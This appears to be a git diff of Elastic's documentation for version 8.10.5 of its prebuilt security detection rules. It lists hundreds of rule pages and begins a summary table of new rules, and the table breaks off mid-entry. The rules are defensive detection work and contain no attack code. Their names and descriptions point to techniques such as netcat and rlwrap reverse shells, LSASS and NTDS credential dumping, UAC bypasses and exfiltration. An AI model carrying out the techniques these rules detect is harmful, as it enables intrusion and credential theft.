+include::prebuilt-rule-8-10-5-potential-pspy-process-monitoring-detected.asciidoc[] +include::prebuilt-rule-8-10-5-sudo-command-enumeration-detected.asciidoc[] +include::prebuilt-rule-8-10-5-suid-sguid-enumeration-detected.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-user-privilege-enumeration-via-id.asciidoc[] +include::prebuilt-rule-8-10-5-virtual-machine-fingerprinting.asciidoc[] +include::prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc[] +include::prebuilt-rule-8-10-5-potential-curl-cve-2023-38545-exploitation.asciidoc[] +include::prebuilt-rule-8-10-5-file-creation-execution-and-self-deletion-in-suspicious-directory.asciidoc[] +include::prebuilt-rule-8-10-5-file-transfer-or-listener-established-via-netcat.asciidoc[] +include::prebuilt-rule-8-10-5-network-connection-via-recently-compiled-executable.asciidoc[] +include::prebuilt-rule-8-10-5-interactive-terminal-spawned-via-perl.asciidoc[] +include::prebuilt-rule-8-10-5-process-started-from-process-id-pid-file.asciidoc[] +include::prebuilt-rule-8-10-5-binary-executed-from-shared-memory-directory.asciidoc[] +include::prebuilt-rule-8-10-5-interactive-terminal-spawned-via-python.asciidoc[] +include::prebuilt-rule-8-10-5-potential-code-execution-via-postgresql.asciidoc[] +include::prebuilt-rule-8-10-5-linux-restricted-shell-breakout-via-linux-binary-s.asciidoc[] +include::prebuilt-rule-8-10-5-deprecated-potential-reverse-shell-via-suspicious-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-background-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-java.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-meterpreter-reverse-shell.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-suspicious-binary.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell.asciidoc[] +include::prebuilt-rule-8-10-5-potential-reverse-shell-via-udp.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-content-extracted-or-decompressed-via-funzip.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-system-commands-executed-by-previously-unknown-executable.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-mining-process-creation-event.asciidoc[] +include::prebuilt-rule-8-10-5-bpf-filter-applied-using-tc.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-data-encryption-via-openssl-utility.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-termination-of-esxi-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-file-changes-activity-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-ransomware-note-creation-detected.asciidoc[] +include::prebuilt-rule-8-10-5-high-number-of-process-terminations.asciidoc[] +include::prebuilt-rule-8-10-5-connection-to-external-network-via-telnet.asciidoc[] +include::prebuilt-rule-8-10-5-connection-to-internal-network-via-telnet.asciidoc[] +include::prebuilt-rule-8-10-5-chkconfig-service-add.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-openssh-binaries.asciidoc[] +include::prebuilt-rule-8-10-5-cron-job-created-or-changed-by-previously-unknown-process.asciidoc[] +include::prebuilt-rule-8-10-5-dynamic-linker-copy.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-file-creation-in-etc-for-persistence.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-through-init-d-detected.asciidoc[] +include::prebuilt-rule-8-10-5-kernel-module-load-via-insmod.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc[] +include::prebuilt-rule-8-10-5-potential-linux-backdoor-user-account-creation.asciidoc[] +include::prebuilt-rule-8-10-5-potential-remote-code-execution-via-web-server.asciidoc[] +include::prebuilt-rule-8-10-5-linux-user-added-to-privileged-group.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-through-motd-file-creation-detected.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-process-spawned-from-motd-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-through-run-control-detected.asciidoc[] +include::prebuilt-rule-8-10-5-shared-object-created-or-changed-by-previously-unknown-process.asciidoc[] +include::prebuilt-rule-8-10-5-new-systemd-timer-created.asciidoc[] +include::prebuilt-rule-8-10-5-new-systemd-service-created-by-previously-unknown-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-unauthorized-access-via-wildcard-injection-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-container-misconfiguration.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-dynamic-linker-preload-shared-object.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-symbolic-link-created.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-uid-int-max-bug-detected.asciidoc[] +include::prebuilt-rule-8-10-5-kernel-load-or-unload-via-kexec-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-cve-2023-4911.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-overlayfs.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-pkexec.asciidoc[] +include::prebuilt-rule-8-10-5-potential-shell-via-wildcard-injection-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-suspicious-debugfs-root-device-access.asciidoc[] +include::prebuilt-rule-8-10-5-potential-shadow-file-read-via-command-line-utilities.asciidoc[] +include::prebuilt-rule-8-10-5-potential-sudo-privilege-escalation-via-cve-2019-14287.asciidoc[] +include::prebuilt-rule-8-10-5-potential-sudo-hijacking-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-sudo-token-manipulation-via-process-injection.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-recently-compiled-executable.asciidoc[] +include::prebuilt-rule-8-10-5-namespace-manipulation-using-unshare.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-through-writable-docker-socket.asciidoc[] +include::prebuilt-rule-8-10-5-cobalt-strike-command-and-control-beacon.asciidoc[] +include::prebuilt-rule-8-10-5-possible-fin7-dga-command-and-control-behavior.asciidoc[] +include::prebuilt-rule-8-10-5-halfbaked-command-and-control-beacon.asciidoc[] +include::prebuilt-rule-8-10-5-potential-network-sweep-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-network-scan-detected.asciidoc[] +include::prebuilt-rule-8-10-5-potential-syn-based-network-scan-detected.asciidoc[] +include::prebuilt-rule-8-10-5-inbound-connection-to-an-unsecure-elasticsearch-node.asciidoc[] +include::prebuilt-rule-8-10-5-exporting-exchange-mailbox-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-exchange-mailbox-export-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-suspicious-script-with-audio-capture-capabilities.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-keylogging-script.asciidoc[] +include::prebuilt-rule-8-10-5-encrypting-files-with-winrar-or-7z.asciidoc[] +include::prebuilt-rule-8-10-5-potential-file-transfer-via-certreq.asciidoc[] +include::prebuilt-rule-8-10-5-connection-to-commonly-abused-web-services.asciidoc[] +include::prebuilt-rule-8-10-5-potential-dns-tunneling-via-nslookup.asciidoc[] +include::prebuilt-rule-8-10-5-port-forwarding-rule-addition.asciidoc[] +include::prebuilt-rule-8-10-5-potential-remote-desktop-tunneling-detected.asciidoc[] +include::prebuilt-rule-8-10-5-remote-file-download-via-script-interpreter.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-windows-utilities.asciidoc[] +include::prebuilt-rule-8-10-5-ntds-or-sam-database-file-copied.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-trusted-developer-utility.asciidoc[] +include::prebuilt-rule-8-10-5-firsttime-seen-account-performing-dcsync.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-dcsync.asciidoc[] +include::prebuilt-rule-8-10-5-kerberos-pre-authentication-disabled-for-user.asciidoc[] +include::prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc[] +include::prebuilt-rule-8-10-5-lsass-process-access-via-windows-api.asciidoc[] +include::prebuilt-rule-8-10-5-potential-local-ntlm-relay-via-http.asciidoc[] +include::prebuilt-rule-8-10-5-sensitive-privilege-seenabledelegationprivilege-assigned-to-a-user.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-renamed-com-services-dll.asciidoc[] +include::prebuilt-rule-8-10-5-potential-credential-access-via-lsass-memory-dump.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-remote-registry-access-via-sebackupprivilege.asciidoc[] +include::prebuilt-rule-8-10-5-symbolic-link-to-shadow-copy-created.asciidoc[] +include::prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-amsienable-registry-key.asciidoc[] +include::prebuilt-rule-8-10-5-clearing-windows-console-history.asciidoc[] +include::prebuilt-rule-8-10-5-clearing-windows-event-logs.asciidoc[] +include::prebuilt-rule-8-10-5-code-signing-policy-modification-through-registry.asciidoc[] +include::prebuilt-rule-8-10-5-windows-defender-disabled-via-registry-modification.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-script-block-logging-disabled.asciidoc[] +include::prebuilt-rule-8-10-5-disabling-windows-defender-security-settings-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-disable-windows-event-and-security-logs-using-built-in-tools.asciidoc[] +include::prebuilt-rule-8-10-5-dns-over-https-enabled-via-registry.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-net-code-compilation.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-build-engine-started-by-a-script-process.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-build-engine-using-an-alternate-name.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-build-engine-started-an-unusual-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc[] +include::prebuilt-rule-8-10-5-process-injection-by-the-microsoft-build-engine.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-endpoint-security-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-werfault-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-potential-windows-error-manager-masquerading.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-windows-defender-tampering.asciidoc[] +include::prebuilt-rule-8-10-5-network-connection-via-signed-binary.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-network-activity-from-a-windows-system-binary.asciidoc[] +include::prebuilt-rule-8-10-5-parent-process-pid-spoofing.asciidoc[] +include::prebuilt-rule-8-10-5-local-account-tokenfilter-policy-disabled.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-net-reflection-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-potential-process-injection-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-windows-firewall-disabled-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-process-termination-followed-by-deletion.asciidoc[] +include::prebuilt-rule-8-10-5-scheduled-tasks-at-command-enabled.asciidoc[] +include::prebuilt-rule-8-10-5-potential-secure-file-deletion-via-sdelete-utility.asciidoc[] +include::prebuilt-rule-8-10-5-solarwinds-process-disabling-services-via-registry.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-execution-from-a-mounted-device.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-managed-code-hosting-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-process-access-via-direct-system-call.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-script-object-execution.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-wmic-xsl-script-execution.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-zoom-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-executable-file-creation-by-a-system-critical-process.asciidoc[] +include::prebuilt-rule-8-10-5-unsigned-dll-side-loading-from-a-suspicious-folder.asciidoc[] +include::prebuilt-rule-8-10-5-untrusted-driver-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-adfind-command-activity.asciidoc[] +include::prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-share-enumeration-script.asciidoc[] +include::prebuilt-rule-8-10-5-powershell-suspicious-discovery-related-windows-api-functions.asciidoc[] +include::prebuilt-rule-8-10-5-command-execution-via-solarwinds-process.asciidoc[] +include::prebuilt-rule-8-10-5-command-shell-activity-started-via-rundll32.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-portable-executable-encoded-in-powershell-script.asciidoc[] +include::prebuilt-rule-8-10-5-psexec-network-connection.asciidoc[] +include::prebuilt-rule-8-10-5-network-connection-via-registration-utility.asciidoc[] +include::prebuilt-rule-8-10-5-outbound-scheduled-task-activity-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-cmd-execution-via-wmi.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-pdf-reader-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-process-execution-via-renamed-psexec-executable.asciidoc[] +include::prebuilt-rule-8-10-5-conhost-spawned-by-suspicious-parent-process.asciidoc[] +include::prebuilt-rule-8-10-5-third-party-backup-files-deleted-via-unexpected-process.asciidoc[] +include::prebuilt-rule-8-10-5-deleting-backup-catalogs-with-wbadmin.asciidoc[] +include::prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-volume-shadow-copy-deletion-via-wmic.asciidoc[] +include::prebuilt-rule-8-10-5-windows-script-executing-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-windows-script-interpreter-executing-process-via-wmi.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-exchange-server-um-writing-suspicious-files.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-exchange-server-um-spawning-suspicious-processes.asciidoc[] +include::prebuilt-rule-8-10-5-microsoft-exchange-worker-spawning-suspicious-processes.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-ms-office-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-ms-outlook-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-explorer-child-process.asciidoc[] +include::prebuilt-rule-8-10-5-incoming-dcom-lateral-movement-with-mmc.asciidoc[] +include::prebuilt-rule-8-10-5-nullsessionpipe-registry-modification.asciidoc[] +include::prebuilt-rule-8-10-5-potential-remote-desktop-shadowing-activity.asciidoc[] +include::prebuilt-rule-8-10-5-potential-lateral-tool-transfer-via-smb-share.asciidoc[] +include::prebuilt-rule-8-10-5-execution-via-tsclient-mountpoint.asciidoc[] +include::prebuilt-rule-8-10-5-remote-execution-via-file-shares.asciidoc[] +include::prebuilt-rule-8-10-5-wmi-incoming-lateral-movement.asciidoc[] +include::prebuilt-rule-8-10-5-incoming-execution-via-powershell-remoting.asciidoc[] +include::prebuilt-rule-8-10-5-rdp-enabled-via-registry.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-rdp-activex-client-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-child-process-of-dns-exe.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-file-modification-by-dns-exe.asciidoc[] +include::prebuilt-rule-8-10-5-lateral-movement-via-startup-folder.asciidoc[] +include::prebuilt-rule-8-10-5-adminsdholder-backdoor.asciidoc[] +include::prebuilt-rule-8-10-5-adobe-hijack-persistence.asciidoc[] +include::prebuilt-rule-8-10-5-registry-persistence-via-appcert-dll.asciidoc[] +include::prebuilt-rule-8-10-5-registry-persistence-via-appinit-dll.asciidoc[] +include::prebuilt-rule-8-10-5-image-file-execution-options-injection.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-startup-shell-folder-modification.asciidoc[] +include::prebuilt-rule-8-10-5-scheduled-task-created-by-a-windows-script.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-microsoft-office-addins.asciidoc[] +include::prebuilt-rule-8-10-5-new-activesyncalloweddeviceid-added-via-powershell.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-powershell-profile.asciidoc[] +include::prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc[] +include::prebuilt-rule-8-10-5-adminsdholder-sdprop-exclusion-added.asciidoc[] +include::prebuilt-rule-8-10-5-unsigned-dll-loaded-by-svchost.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-persistence-via-services-registry.asciidoc[] +include::prebuilt-rule-8-10-5-startup-folder-persistence-via-unsigned-process.asciidoc[] +include::prebuilt-rule-8-10-5-component-object-model-hijacking.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-image-load-taskschd-dll-from-ms-office.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-execution-via-scheduled-task.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-imagepath-service-creation.asciidoc[] +include::prebuilt-rule-8-10-5-system-shells-via-services.asciidoc[] +include::prebuilt-rule-8-10-5-temporarily-scheduled-task-creation.asciidoc[] +include::prebuilt-rule-8-10-5-potential-persistence-via-time-provider-modification.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-hidden-run-key-detected.asciidoc[] +include::prebuilt-rule-8-10-5-installation-of-security-support-provider.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-update-orchestrator-service-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-persistence-via-wmi-event-subscription.asciidoc[] +include::prebuilt-rule-8-10-5-execution-via-mssql-xp-cmdshell-stored-procedure.asciidoc[] +include::prebuilt-rule-8-10-5-web-shell-detection-script-process-child-of-common-web-processes.asciidoc[] +include::prebuilt-rule-8-10-5-modification-of-the-mspkiaccountcredentials.asciidoc[] +include::prebuilt-rule-8-10-5-disabling-user-account-control-via-registry-modification.asciidoc[] +include::prebuilt-rule-8-10-5-first-time-seen-driver-loaded.asciidoc[] +include::prebuilt-rule-8-10-5-creation-or-modification-of-a-new-gpo-scheduled-task-or-service.asciidoc[] +include::prebuilt-rule-8-10-5-scheduled-task-execution-at-scale-via-gpo.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privilege-escalation-via-installerfiletakeover.asciidoc[] +include::prebuilt-rule-8-10-5-suspicious-dll-loaded-for-persistence-or-privilege-escalation.asciidoc[] +include::prebuilt-rule-8-10-5-potential-port-monitor-or-print-processor-registration-abuse.asciidoc[] +include::prebuilt-rule-8-10-5-potential-privileged-escalation-via-samaccountname-spoofing.asciidoc[] +include::prebuilt-rule-8-10-5-service-control-spawned-via-script-interpreter.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-with-ieditionupgrademanager-elevated-com-interface.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-via-elevated-com-internet-explorer-add-on-installer.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-via-icmluautil-elevated-com-interface.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-via-diskcleanup-scheduled-task-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-via-privileged-ifileoperation-com-interface.asciidoc[] +include::prebuilt-rule-8-10-5-bypass-uac-via-event-viewer.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-attempt-via-windows-directory-masquerading.asciidoc[] +include::prebuilt-rule-8-10-5-uac-bypass-via-windows-firewall-snap-in-hijack.asciidoc[] +include::prebuilt-rule-8-10-5-unusual-service-host-child-process-childless-service.asciidoc[] diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc new file mode 100644 index 0000000000..b9ab1ddc72 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rules-8-10-5-summary.asciidoc @@ -0,0 +1,626 @@ +[[prebuilt-rule-8-10-5-prebuilt-rules-8-10-5-summary]] +[role="xpack"] +== Update v8.10.5 + +This section lists all updates associated with version 8.10.5 of the Fleet integration *Prebuilt Security Detection Rules*. + + +[width="100%",options="header"] +|============================================== +|Rule |Description |Status |Version + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-iso-code, Potential Data Exfiltration Activity to an Unusual ISO Code>> | A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-ip-address, Potential Data Exfiltration Activity to an Unusual IP Address>> | A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-destination-port, Potential Data Exfiltration Activity to an Unusual Destination Port>> | A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-data-exfiltration-activity-to-an-unusual-region, Potential Data Exfiltration Activity to an Unusual Region>> | A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. | new | 1 + +|<<prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device, Spike in Bytes Sent to an External Device>> | A machine learning job has detected high bytes of data written to an external device. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. | new | 1 + +|<<prebuilt-rule-8-10-5-spike-in-bytes-sent-to-an-external-device-via-airdrop, Spike in Bytes Sent to an External Device via Airdrop>> | A machine learning job has detected high bytes of data written to an external device via Airdrop. In a typical operational setting, there is usually a predictable pattern or a certain range of data that is written to external devices. An unusually large amount of data being written is anomalous and can signal illicit data copying or transfer activities. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-writing-data-to-an-external-device, Unusual Process Writing Data to an External Device>> | A machine learning job has detected a rare process writing data to an external device. Malicious actors often use benign-looking processes to mask their data exfiltration activities. The discovery of such a process that has no legitimate reason to write data to external devices can indicate exfiltration. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain, Machine Learning Detected DGA activity using a known SUNBURST DNS domain>> | A supervised machine learning model has identified a DNS question name that used by the SUNBURST malware and is predicted to be the result of a Domain Generation Algorithm. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-dga-activity, Potential DGA Activity>> | A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-with-a-high-dga-probability-score, Machine Learning Detected a DNS Request With a High DGA Probability Score>> | A supervised machine learning model has identified a DNS question name with a high probability of sourcing from a Domain Generation Algorithm (DGA), which could indicate command and control network activity. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain, Machine Learning Detected a DNS Request Predicted to be a DGA Domain>> | A supervised machine learning model has identified a DNS question name that is predicted to be the result of a Domain Generation Algorithm (DGA), which could indicate command and control network activity. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-spawned-by-a-host, Unusual Process Spawned by a Host>> | A machine learning job has detected a suspicious Windows process. This process has been classified as suspicious in two ways. It was predicted to be suspicious by the ProblemChild supervised ML model, and it was found to be an unusual process, on a host that does not commonly manifest malicious activity. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-spawned-by-a-parent-process, Unusual Process Spawned by a Parent Process>> | A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be an unusual child process name, for the parent process, by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-unusual-process-spawned-by-a-user, Unusual Process Spawned by a User>> | A machine learning job has detected a suspicious Windows process. This process has been classified as malicious in two ways. It was predicted to be malicious by the ProblemChild supervised ML model, and it was found to be suspicious given that its user context is unusual and does not commonly manifest malicious activity,by an unsupervised ML model. Such a process may be an instance of suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity, Machine Learning Detected a Suspicious Windows Event Predicted to be Malicious Activity>> | A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. | new | 1 + +|<<prebuilt-rule-8-10-5-machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score, Machine Learning Detected a Suspicious Windows Event with a High Malicious Probability Score>> | A supervised machine learning model (ProblemChild) has identified a suspicious Windows process event with high probability of it being malicious activity. Alternatively, the model's blocklist identified the event as being malicious. | new | 1 + +|<<prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-host, Suspicious Windows Process Cluster Spawned by a Host>> | A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same host name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-parent-process, Suspicious Windows Process Cluster Spawned by a Parent Process>> | A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same parent process name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-suspicious-windows-process-cluster-spawned-by-a-user, Suspicious Windows Process Cluster Spawned by a User>> | A machine learning job combination has detected a set of one or more suspicious Windows processes with unusually high scores for malicious probability. These process(es) have been classified as malicious in several ways. The process(es) were predicted to be malicious by the ProblemChild supervised ML model. If the anomaly contains a cluster of suspicious processes, each process has the same user name, and the aggregate score of the event cluster was calculated to be unusually high by an unsupervised ML model. Such a cluster often contains suspicious or malicious activity, possibly involving LOLbins, that may be resistant to detection using conventional search rules. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-network-scan-executed-from-host, Potential Network Scan Executed From Host>> | This threshold rule monitors for the rapid execution of unix utilities that are capable of conducting network scans. Adversaries may leverage built-in tools such as ping, netcat or socat to execute ping sweeps across the network while attempting to evade detection or due to the lack of network mapping tools available on the compromised host. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-upgrade-of-non-interactive-shell, Potential Upgrade of Non-interactive Shell>> | Identifies when a non-interactive terminal (tty) is being upgraded to a fully interactive shell. Attackers may upgrade a simple reverse shell to a fully interactive tty after obtaining initial access to a host, in order to obtain a more stable connection. | new | 1 + +|<<prebuilt-rule-8-10-5-netcat-listener-established-via-rlwrap, Netcat Listener Established via rlwrap>> | Monitors for the execution of a netcat listener via rlwrap. rlwrap is a 'readline wrapper', a small utility that uses the GNU Readline library to allow the editing of keyboard input for any command. This utility can be used in conjunction with netcat to gain a more stable reverse shell. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-linux-hack-tool-launched, Potential Linux Hack Tool Launched>> | Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-ssh-it-ssh-worm-downloaded, Potential SSH-IT SSH Worm Downloaded>> | Identifies processes that are capable of downloading files with command line arguments containing URLs to SSH-IT's autonomous SSH worm. This worm intercepts outgoing SSH connections every time a user uses ssh. | new | 1 + +|<<prebuilt-rule-8-10-5-setcap-setuid-setgid-capability-set, Setcap setuid/setgid Capability Set>> | This rule monitors for the addition of the cap_setuid+ep or cap_setgid+ep capabilities via setcap. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to achieve persistence by creating malicious binaries, allowing them to maintain control over a compromised system with elevated permissions. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-privilege-escalation-via-python-cap-setuid, Potential Privilege Escalation via Python cap_setuid>> | This detection rule monitors for the execution of a system command with setuid or setgid capabilities via Python, followed by a uid or gid change to the root user. This sequence of events may indicate successful privilege escalation. Setuid (Set User ID) and setgid (Set Group ID) are Unix-like OS features that enable processes to run with elevated privileges, based on the file owner or group. Threat actors can exploit these attributes to escalate privileges to the privileges that are set on the binary that is being executed. | new | 1 + +|<<prebuilt-rule-8-10-5-potential-masquerading-as-communication-apps, Potential Masquerading as Communication Apps>> | Identifies suspicious instances of communications apps, both unsigned and renamed ones, that can indicate an attempt to conceal malicious activity, bypass security features such as allowlists, or trick users into executing malware. | new | 4 + +|<<prebuilt-rule-8-10-5-expired-or-revoked-driver-loaded, Expired or Revoked Driver Loaded>> | Identifies an attempt to load a revoked or expired driver. 